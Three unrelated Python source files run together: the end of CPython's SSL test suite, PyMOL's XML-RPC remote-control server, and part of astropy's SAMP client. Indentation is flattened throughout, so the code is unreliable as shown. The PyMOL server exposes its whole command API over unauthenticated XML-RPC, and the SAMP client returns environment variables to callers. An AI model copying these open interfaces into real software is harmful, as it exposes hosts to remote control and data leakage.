s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_TLSv1_3
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
class TestEnumerations(unittest.TestCase):
def test_tlsversion(self):
class CheckedTLSVersion(enum.IntEnum):
MINIMUM_SUPPORTED = _ssl.PROTO_MINIMUM_SUPPORTED
SSLv3 = _ssl.PROTO_SSLv3
TLSv1 = _ssl.PROTO_TLSv1
TLSv1_1 = _ssl.PROTO_TLSv1_1
TLSv1_2 = _ssl.PROTO_TLSv1_2
TLSv1_3 = _ssl.PROTO_TLSv1_3
MAXIMUM_SUPPORTED = _ssl.PROTO_MAXIMUM_SUPPORTED
enum._test_simple_enum(CheckedTLSVersion, TLSVersion)
def test_tlscontenttype(self):
class Checked_TLSContentType(enum.IntEnum):
"""Content types (record layer)
See RFC 8446, section B.1
"""
CHANGE_CIPHER_SPEC = 20
ALERT = 21
HANDSHAKE = 22
APPLICATION_DATA = 23
# pseudo content types
HEADER = 0x100
INNER_CONTENT_TYPE = 0x101
enum._test_simple_enum(Checked_TLSContentType, _TLSContentType)
def test_tlsalerttype(self):
class Checked_TLSAlertType(enum.IntEnum):
"""Alert types for TLSContentType.ALERT messages
See RFC 8446, section B.2
"""
CLOSE_NOTIFY = 0
UNEXPECTED_MESSAGE = 10
BAD_RECORD_MAC = 20
DECRYPTION_FAILED = 21
RECORD_OVERFLOW = 22
DECOMPRESSION_FAILURE = 30
HANDSHAKE_FAILURE = 40
NO_CERTIFICATE = 41
BAD_CERTIFICATE = 42
UNSUPPORTED_CERTIFICATE = 43
CERTIFICATE_REVOKED = 44
CERTIFICATE_EXPIRED = 45
CERTIFICATE_UNKNOWN = 46
ILLEGAL_PARAMETER = 47
UNKNOWN_CA = 48
ACCESS_DENIED = 49
DECODE_ERROR = 50
DECRYPT_ERROR = 51
EXPORT_RESTRICTION = 60
PROTOCOL_VERSION = 70
INSUFFICIENT_SECURITY = 71
INTERNAL_ERROR = 80
INAPPROPRIATE_FALLBACK = 86
USER_CANCELED = 90
NO_RENEGOTIATION = 100
MISSING_EXTENSION = 109
UNSUPPORTED_EXTENSION = 110
CERTIFICATE_UNOBTAINABLE = 111
UNRECOGNIZED_NAME = 112
BAD_CERTIFICATE_STATUS_RESPONSE = 113
BAD_CERTIFICATE_HASH_VALUE = 114
UNKNOWN_PSK_IDENTITY = 115
CERTIFICATE_REQUIRED = 116
NO_APPLICATION_PROTOCOL = 120
enum._test_simple_enum(Checked_TLSAlertType, _TLSAlertType)
def test_tlsmessagetype(self):
class Checked_TLSMessageType(enum.IntEnum):
"""Message types (handshake protocol)
See RFC 8446, section B.3
"""
HELLO_REQUEST = 0
CLIENT_HELLO = 1
SERVER_HELLO = 2
HELLO_VERIFY_REQUEST = 3
NEWSESSION_TICKET = 4
END_OF_EARLY_DATA = 5
HELLO_RETRY_REQUEST = 6
ENCRYPTED_EXTENSIONS = 8
CERTIFICATE = 11
SERVER_KEY_EXCHANGE = 12
CERTIFICATE_REQUEST = 13
SERVER_DONE = 14
CERTIFICATE_VERIFY = 15
CLIENT_KEY_EXCHANGE = 16
FINISHED = 20
CERTIFICATE_URL = 21
CERTIFICATE_STATUS = 22
SUPPLEMENTAL_DATA = 23
KEY_UPDATE = 24
NEXT_PROTO = 67
MESSAGE_HASH = 254
CHANGE_CIPHER_SPEC = 0x0101
enum._test_simple_enum(Checked_TLSMessageType, _TLSMessageType)
def test_sslmethod(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_options(self):
CheckedOptions = enum._old_convert_(
enum.IntFlag, 'Options', 'ssl',
lambda name: name.startswith('OP_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedOptions, ssl.Options)
def test_alertdescription(self):
CheckedAlertDescription = enum._old_convert_(
enum.IntEnum, 'AlertDescription', 'ssl',
lambda name: name.startswith('ALERT_DESCRIPTION_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedAlertDescription, ssl.AlertDescription)
def test_sslerrornumber(self):
Checked_SSLErrorNumber = enum._old_convert_(
enum.IntEnum, 'SSLErrorNumber', 'ssl',
lambda name: name.startswith('SSL_ERROR_'),
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLErrorNumber, ssl.SSLErrorNumber)
def test_verifyflags(self):
CheckedVerifyFlags = enum._old_convert_(
enum.IntFlag, 'VerifyFlags', 'ssl',
lambda name: name.startswith('VERIFY_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyFlags, ssl.VerifyFlags)
def test_verifymode(self):
CheckedVerifyMode = enum._old_convert_(
enum.IntEnum, 'VerifyMode', 'ssl',
lambda name: name.startswith('CERT_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyMode, ssl.VerifyMode)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = threading_helper.threading_setup()
try:
support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
rpc.py
|
""" an XML-RPC server to allow remote control of PyMol
Author: Greg Landrum (glandrum@users.sourceforge.net)
Created: January 2002
$LastChangedDate$
License: PyMol
Requires:
- a python xmlrpclib distribution containing the SimpleXMLRPCServer
module (1.0 or greater should be fine)
- python with threading enabled
RD Version: $Rev$
Modified 2013-04-17 Thomas Holder, Schrodinger, Inc.
"""
from __future__ import print_function
import sys
if sys.version_info[0] == 2:
import SimpleXMLRPCServer
else:
import xmlrpc.server as SimpleXMLRPCServer
import threading,os,tempfile
from pymol import cmd, cgo, util
# initial port to try for the server
_xmlPort=9123
# number of alternate ports to try if the first fails
_nPortsToTry=5
def rpcPing():
""" Used to establish whether or not the server is alive.
This is a good thing to call after establishing a connection just to
make sure that everything is ok.
Returns 1
"""
return 1
def rpcLabel(pos,labelText,id='lab1',color=(1,1,1)):
""" create a text label
Arguments:
pos: a 3 tuple with the position of the label
labelText: a string with the label text
id: (OPTIONAL) the name of the object to be created
color: (OPTIONAL) a 3 tuple with the color of the label. (1,1,1) is white
NOTE:
at the moment this is something of a hack
"""
cmd.pseudoatom(id, label=repr(labelText), elem='C', pos=pos)
cmd.set_color("%s-color"%id,color)
cmd.color("%s-color"%id,id)
return 1
def rpcResetCGO(id):
""" removes a CGO from the local dictionary
"""
global cgoDict
if id=="*":
cgoDict={}
res = 1
elif id in cgoDict:
del(cgoDict[id])
res = 1
else:
res = 0
return res
def rpcSphere(pos,rad,color,id='cgo',extend=1,
transparent=0,transparency=0.5):
""" create a sphere
Arguments:
pos: a 3 tuple with the position of the sphere
rad: a float with the radius
color: a 3 tuple with the color of the sphere. (1,1,1) is white
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the sphere is appended to any
existing object with this id. Otherwise the object is cleared first
transparent: (OPTIONAL) sets the object to be transparent
transparency: (OPTIONAL) the transparency of the object (0 to 1)
"""
r,g,b = color
x,y,z = pos
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.COLOR,r,g,b,cgo.SPHERE,x,y,z,rad])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcRenderCGO(cgoV,id='cgo',extend=1):
""" renders a CGO vector
Arguments:
cgoV: a vector of floats
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the CGO is appended to any
existing object with this id. Otherwise the object is cleared first
"""
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
obj.extend(cgoV)
cmd.load_cgo(obj,id,1)
return 1
def rpcSpheres(sphereD,id='cgo',extend=1):
""" create a sphere
Arguments:
sphereD: a series of (pos,rad,color,transparent,transparency) tuples
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the object will be cleared
before adding the new sphere. Otherwise the sphere is appended
to the ojbect
"""
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
for pos,rad,color,transparent,transparency in sphereD:
r,g,b = color
x,y,z = pos
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.COLOR,r,g,b,cgo.SPHERE,x,y,z,rad])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcCylinder(end1,end2,rad,color1,id='cgo',color2=None,extend=1,
transparent=0,transparency=0.5):
""" create a cylinder
Arguments:
end1: a 3 tuple with the position of one end of the cylinder
end2: a 3 tuple with the position of the other end of the cylinder
rad: a float with the radius
color1: a 3 tuple with the color of end1 of the cylinder. (1,1,1) is white
id: (OPTIONAL) the name of the object to be created
color2: (OPTIONAL) a 3 tuple with the color of end2 of the cylinder. (1,1,1)
is white
extend: (OPTIONAL) if this is nonzero, the cylinder is appended to any
existing object with this id. Otherwise the object is cleared first
transparent: (OPTIONAL) sets the object to be transparent
transparency: (OPTIONAL) the transparency of the object (0 to 1)
NOTE: the reason that color2 follows id is that I think clients are
going to be interested in setting the id more often than they are going
to care about the second color.
"""
global cgoDict
if color2 is None: color2 = color1
r1,g1,b1 = color1
r2,g2,b2 = color2
x1,y1,z1 = end1
x2,y2,z2 = end2
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.CYLINDER,x1,y1,z1,x2,y2,z2,rad,r1,g1,b1,r2,g2,b2,])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcDeleteObject(objName):
""" deletes an object """
try:
cmd.delete(objName)
except:
res = 0
else:
res = 1
return res
def rpcDeleteAll():
""" deletes all objects """
res = cmd.delete('all')
if res is not None:
return res
else:
return ''
def colorObj(objName,colorScheme):
""" sets an molecule's color scheme
Arguments:
- objName: the object (molecule) to change
- colorScheme: name of the color scheme to use
for the object (should be either 'std' or one of the
color schemes defined in pymol.utils)
"""
if colorScheme:
if colorScheme == 'std':
# this is an adaptation of the cbag scheme from util.py, but
# with a gray carbon.
cmd.color("magenta","("+objName+")",quiet=1)
cmd.color("oxygen","(elem O and "+objName+")",quiet=1)
cmd.color("nitrogen","(elem N and "+objName+")",quiet=1)
cmd.color("sulfur","(elem S and "+objName+")",quiet=1)
cmd.color("hydrogen","(elem H and "+objName+")",quiet=1)
cmd.color("gray","(elem C and "+objName+")",quiet=1)
elif hasattr(util,colorScheme):
fn = getattr(util,colorScheme)
fn(objName,quiet=1)
res = 1
else:
res = 0
return res
def rpcLoadPDB(data,objName,colorScheme='',replace=1):
""" loads a molecule from a pdb string
Arguments:
data: the pdb block
objName: name of the object to create
colorScheme: (OPTIONAL) name of the color scheme to use
for the molecule (should be either 'std' or one of the
color schemes defined in pymol.util)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
from pymol import util
if replace:
cmd.delete(objName)
res = cmd.read_pdbstr(data,objName)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadMolBlock(data,objName,colorScheme='',replace=1):
""" loads a molecule from a mol block
Arguments:
data: the mol block
objName: name of the object to create
colorScheme: (OPTIONAL) name of the color scheme to use
for the molecule (should be either 'std' or one of the
color schemes defined in pymol.util)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
from pymol import util
if replace:
cmd.delete(objName)
res = cmd.read_molstr(data,objName)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadFile(fileName,objName='',format='',colorScheme='',replace=1):
""" loads an object from a file
Arguments:
fileName: the file to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
colorScheme: (OPTIONAL) name of the color scheme to use
for the object (should be either 'std' or one of the
color schemes defined in pymol.util)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
if not objName:
objName = fileName.split('.')[0]
if replace:
cmd.delete(objName)
res = cmd.load(fileName,objName,format=format)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadSurface(fileName,objName='',format='',surfaceLevel=1.0):
""" loads surface data from a file and adds an isosurface
Arguments:
fileName: the file to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
surfaceLevel: (OPTIONAL) the isosurface level
"""
if not objName:
objName = fileName.split('.')[0]
gridName = 'grid-%s'%objName
res = cmd.load(fileName,gridName,format=format)
cmd.isosurface(objName,gridName,level=surfaceLevel)
if res is not None:
return res
else:
return ''
def rpcLoadSurfaceData(data,objName='surface',format='',surfaceLevel=1.0):
""" loads surface data from a string and adds an isosurface
Arguments:
data: the data to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
surfaceLevel: (OPTIONAL) the isosurface level
"""
gridName = 'grid-%s'%objName
# it would be nice if we didn't have to go by way of the temporary file,
# but at the moment pymol will only read shapes from files
tempnm = tempfile.mktemp('.grd')
with open(tempnm,'w+') as tmpFile:
  tmpFile.write(data)
res = rpcLoadSurface(tempnm,objName,format=format,surfaceLevel=surfaceLevel)
os.unlink(tempnm)
if res is not None:
return res
else:
return ''
def rpcRotate(vect,objName='',state=-1):
""" rotates objects
Arguments:
- vect: a sequence with x y and z rotations
- objName: (OPTIONAL) object to be rotated
- state: (OPTIONAL) if zero only visible states are rotated,
if -1 (the default), all states are rotated
"""
cmd.rotate('x',vect[0],objName,state=state)
cmd.rotate('y',vect[1],objName,state=state)
cmd.rotate('z',vect[2],objName,state=state)
return 1
def rpcGetNames(what='selections',enabledOnly=1):
""" returns the results of cmd.get_names(what) """
return cmd.get_names(what,enabled_only=enabledOnly)
def rpcIdAtom(what='all',mode=0):
""" returns the results of cmd.id_atom(what) """
return cmd.id_atom(what,mode=mode)
def rpcGetAtomCoords(what='all',state=0):
""" returns the results of cmd.get_atom_coords(what,state) """
return cmd.get_atom_coords(what,state=state)
def rpcHelp(what=''):
""" returns general help text or help on a particular command """
global serv
res = 'Command Not Found'
if not what:
res = list(serv.funcs.keys())
else:
funcs = serv.funcs
if what in funcs:
fn = funcs[what]
res = "Function: %s("%what
defs = fn.__defaults__
if defs:
code = fn.__code__
nDefs = len(defs)
args = []
i = -1
for i in range(code.co_argcount - nDefs):
args.append(code.co_varnames[i])
for j in range(nDefs):
vName = code.co_varnames[j+i+1]
args.append("%s=%s"%(vName,repr(defs[j])))
res += ','.join(args)
res += ')\n'
if fn.__doc__:
res += fn.__doc__
return res
def launch_XMLRPC(hostname='',port=_xmlPort,nToTry=_nPortsToTry):
""" launches the xmlrpc server into a separate thread
Arguments:
hostname: (OPTIONAL) name of the host for the server
(defaults to the PYMOL_RPCHOST environment variable, or 'localhost')
port: (OPTIONAL) the first port to try for the server
nToTry: (OPTIONAL) the number of possible ports to try
(in case the first can't be opened)
"""
if not hostname:
import os
hostname = os.environ.get('PYMOL_RPCHOST', 'localhost')
global cgoDict,serv
cgoDict = {}
for i in range(nToTry):
try:
serv = SimpleXMLRPCServer.SimpleXMLRPCServer((hostname,port+i),logRequests=0,
allow_none=True)
except:
serv = None
else:
break
if serv:
print('xml-rpc server running on host %s, port %d'%(hostname,port+i))
# import PyMOL API
from pymol import api
serv.register_instance(cmd)
# legacy stuff with unique names
serv.register_function(rpcPing,'ping')
serv.register_function(rpcResetCGO,'resetCGO')
serv.register_function(rpcRenderCGO,'renderCGO')
serv.register_function(rpcSphere,'sphere')
serv.register_function(rpcSpheres,'spheres')
serv.register_function(rpcCylinder,'cylinder')
serv.register_function(rpcDeleteObject,'deleteObject')
serv.register_function(rpcDeleteAll,'deleteAll')
serv.register_function(rpcLoadPDB,'loadPDB')
serv.register_function(rpcLoadMolBlock,'loadMolBlock')
serv.register_function(rpcLoadSurface,'loadSurface')
serv.register_function(rpcLoadSurfaceData,'loadSurfaceData')
serv.register_function(rpcLoadFile,'loadFile')
serv.register_function(rpcGetNames,'getNames')
serv.register_function(api.count_atoms,'countAtoms')
serv.register_function(rpcIdAtom,'idAtom')
serv.register_function(rpcHelp,'help')
serv.register_function(rpcGetAtomCoords,'getAtomCoords')
# legacy stuff, should be removed because overwrites API names!
serv.register_function(rpcLabel,'label') # pseudoatom
serv.register_function(rpcRotate,'rotate')
serv.register_introspection_functions()
t = threading.Thread(target=serv.serve_forever)
t.daemon = True
t.start()
else:
print('xml-rpc server could not be started')
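# Hedged usage sketch (illustrative only, not part of the original module):
# once launch_XMLRPC() is running inside PyMol, a remote Python process can
# drive it through the standard-library XML-RPC client. The host, port and
# geometry values below are assumptions based on the defaults defined above.
def _exampleRemoteSession(host='localhost', port=_xmlPort):
  """ never called by this module; shows the client side of the RPC calls """
  try:
    from xmlrpc.client import ServerProxy   # Python 3
  except ImportError:
    from xmlrpclib import ServerProxy       # Python 2
  srv = ServerProxy('http://%s:%d' % (host, port))
  srv.ping()                                   # returns 1 if the server is alive
  srv.sphere((0., 0., 0.), 1.0, (1., 0., 0.))  # red unit sphere at the origin
  srv.cylinder((0., 0., 0.), (0., 0., 5.), 0.3,
               (0., 1., 0.))                   # green cylinder along z
  print(srv.help('sphere'))                    # introspect a registered call
  return srv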
# vi:expandtab:smarttab:sw=2
|
client.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import copy
import os
import select
import socket
import threading
import warnings
from urllib.parse import urlunparse
from .constants import SAMP_STATUS_OK, SAMP_STATUS_WARNING
from .hub import SAMPHubServer
from .errors import SAMPClientError, SAMPWarning
from .utils import internet_on, get_num_args
from .standard_profile import ThreadingXMLRPCServer
__all__ = ['SAMPClient']
class SAMPClient:
"""
Utility class which provides facilities to create and manage a SAMP
compliant XML-RPC server that acts as SAMP callable client application.
Parameters
----------
hub : :class:`~astropy.samp.SAMPHubProxy`
An instance of :class:`~astropy.samp.SAMPHubProxy` to be
used for messaging with the SAMP Hub.
name : str, optional
Client name (corresponding to ``samp.name`` metadata keyword).
description : str, optional
Client description (corresponding to ``samp.description.text`` metadata
keyword).
metadata : dict, optional
Client application metadata in the standard SAMP format.
addr : str, optional
Listening address (or IP). This defaults to 127.0.0.1 if the internet
is not reachable, otherwise it defaults to the host name.
port : int, optional
Listening XML-RPC server socket port. If left set to 0 (the default),
the operating system will select a free port.
callable : bool, optional
Whether the client can receive calls and notifications. If set to
`False`, then the client can send notifications and calls, but can not
receive any.
"""
# TODO: define what is meant by callable
def __init__(self, hub, name=None, description=None, metadata=None,
addr=None, port=0, callable=True):
# GENERAL
self._is_running = False
self._is_registered = False
if metadata is None:
metadata = {}
if name is not None:
metadata["samp.name"] = name
if description is not None:
metadata["samp.description.text"] = description
self._metadata = metadata
self._addr = addr
self._port = port
self._xmlrpcAddr = None
self._callable = callable
# HUB INTERACTION
self.client = None
self._public_id = None
self._private_key = None
self._hub_id = None
self._notification_bindings = {}
self._call_bindings = {"samp.app.ping": [self._ping, {}],
"client.env.get": [self._client_env_get, {}]}
self._response_bindings = {}
self._host_name = "127.0.0.1"
if internet_on():
try:
self._host_name = socket.getfqdn()
socket.getaddrinfo(self._addr or self._host_name, self._port or 0)
except socket.error:
self._host_name = "127.0.0.1"
self.hub = hub
if self._callable:
self._thread = threading.Thread(target=self._serve_forever)
self._thread.daemon = True
self.client = ThreadingXMLRPCServer((self._addr or self._host_name,
self._port), logRequests=False, allow_none=True)
self.client.register_introspection_functions()
self.client.register_function(self.receive_notification, 'samp.client.receiveNotification')
self.client.register_function(self.receive_call, 'samp.client.receiveCall')
self.client.register_function(self.receive_response, 'samp.client.receiveResponse')
# If the port was set to zero, then the operating system has
# selected a free port. We now check what this port number is.
if self._port == 0:
self._port = self.client.socket.getsockname()[1]
protocol = 'http'
self._xmlrpcAddr = urlunparse((protocol,
'{0}:{1}'.format(self._addr or self._host_name,
self._port),
'', '', '', ''))
def start(self):
"""
Start the client in a separate thread (non-blocking).
This only has an effect if ``callable`` was set to `True` when
initializing the client.
"""
if self._callable:
self._is_running = True
self._run_client()
def stop(self, timeout=10.):
"""
Stop the client.
Parameters
----------
timeout : float
Timeout after which to give up if the client cannot be cleanly
shut down.
"""
# Setting _is_running to False causes the loop in _serve_forever to
# exit. The thread should then stop running. We wait for the thread to
# terminate until the timeout, then we continue anyway.
self._is_running = False
if self._callable and self._thread.is_alive():
self._thread.join(timeout)
if self._thread.is_alive():
raise SAMPClientError("Client was not shut down successfully "
"(timeout={0}s)".format(timeout))
@property
def is_running(self):
"""
Whether the client is currently running.
"""
return self._is_running
@property
def is_registered(self):
"""
Whether the client is currently registered.
"""
return self._is_registered
def _run_client(self):
if self._callable:
self._thread.start()
def _serve_forever(self):
while self._is_running:
try:
read_ready = select.select([self.client.socket], [], [], 0.1)[0]
except OSError as exc:
warnings.warn("Call to select in SAMPClient failed: {0}".format(exc),
SAMPWarning)
else:
if read_ready:
self.client.handle_request()
self.client.server_close()
def _ping(self, private_key, sender_id, msg_id, msg_mtype, msg_params,
message):
reply = {"samp.status": SAMP_STATUS_OK, "samp.result": {}}
self.hub.reply(private_key, msg_id, reply)
def _client_env_get(self, private_key, sender_id, msg_id, msg_mtype,
msg_params, message):
if msg_params["name"] in os.environ:
reply = {"samp.status": SAMP_STATUS_OK,
"samp.result": {"value": os.environ[msg_params["name"]]}}
else:
reply = {"samp.status": SAMP_STATUS_WARNING,
"samp.result": {"value": ""},
"samp.error": {"samp.errortxt":
"Environment variable not defined."}}
self.hub.reply(private_key, msg_id, reply)
def _handle_notification(self, private_key, sender_id, message):
if private_key == self.get_private_key() and "samp.mtype" in message:
msg_mtype = message["samp.mtype"]
del message["samp.mtype"]
msg_params = message["samp.params"]
del message["samp.params"]
msubs = SAMPHubServer.get_mtype_subtypes(msg_mtype)
for mtype in msubs:
if mtype in self._notification_bindings:
bound_func = self._notification_bindings[mtype][0]
if get_num_args(bound_func) == 5:
bound_func(private_key, sender_id, msg_mtype,
msg_params, message)
else:
bound_func(private_key, sender_id, None, msg_mtype,
msg_params, message)
return ""
def receive_notification(self, private_key, sender_id, message):
"""
Standard callable client ``receive_notification`` method.
This method is automatically handled when the
:meth:`~astropy.samp.client.SAMPClient.bind_receive_notification`
method is used to bind distinct operations to MTypes. In case of a
customized callable client implementation that inherits from the
:class:`~astropy.samp.SAMPClient` class this method should be
overwritten.
.. note:: When overwritten, this method must always return
a string result (even empty).
Parameters
----------
private_key : str
Client private key.
sender_id : str
Sender public ID.
message : dict
Received message.
Returns
-------
confirmation : str
Any confirmation string.
"""
return self._handle_notification(private_key, sender_id, message)
def _handle_call(self, private_key, sender_id, msg_id, message):
if private_key == self.get_private_key() and "samp.mtype" in message:
msg_mtype = message["samp.mtype"]
del message["samp.mtype"]
msg_params = message["samp.params"]
del message["samp.params"]
msubs = SAMPHubServer.get_mtype_subtypes(msg_mtype)
for mtype in msubs:
if mtype in self._call_bindings:
self._call_bindings[mtype][0](private_key, sender_id,
msg_id, msg_mtype,
